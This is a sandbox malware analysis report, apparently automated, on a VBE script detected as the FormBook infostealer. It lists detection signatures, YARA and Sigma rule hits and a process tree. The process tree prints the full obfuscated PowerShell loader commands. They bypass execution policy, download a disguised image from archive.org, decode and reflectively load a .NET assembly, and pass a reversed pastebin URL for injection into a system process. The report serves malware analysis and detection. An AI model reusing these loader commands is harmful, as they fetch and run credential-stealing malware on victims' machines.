Windows
Analysis Report
10092024150836 09.10.2024.vbe
Overview
General Information
Detection
FormBook
| Field | Value |
|---|---|
| Score | 100 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7068, cmdline: `C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"`, MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6568, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 380, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1492, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"`, MD5: 04029E121A0CFA5991749937DD22A1D9)
- appidtel.exe (PID: 1864, cmdline: `"C:\Windows\SysWOW64\appidtel.exe"`, MD5: 2C04FB942B2735073D75063E9FFBF50C)
- QEwzeZKCXN.exe (PID: 5908, cmdline: `"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"`, MD5: 32B8AD6ECA9094891E792631BAEA9717)
- dllhost.exe (PID: 3516, cmdline: `"C:\Windows\SysWOW64\dllhost.exe"`, MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
- QEwzeZKCXN.exe (PID: 524, cmdline: `"C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe"`, MD5: 32B8AD6ECA9094891E792631BAEA9717)
- firefox.exe (PID: 4140, cmdline: `"C:\Program Files\Mozilla Firefox\Firefox.exe"`, MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

System Summary

Source: | Author: Florian Roth (Nextron Systems)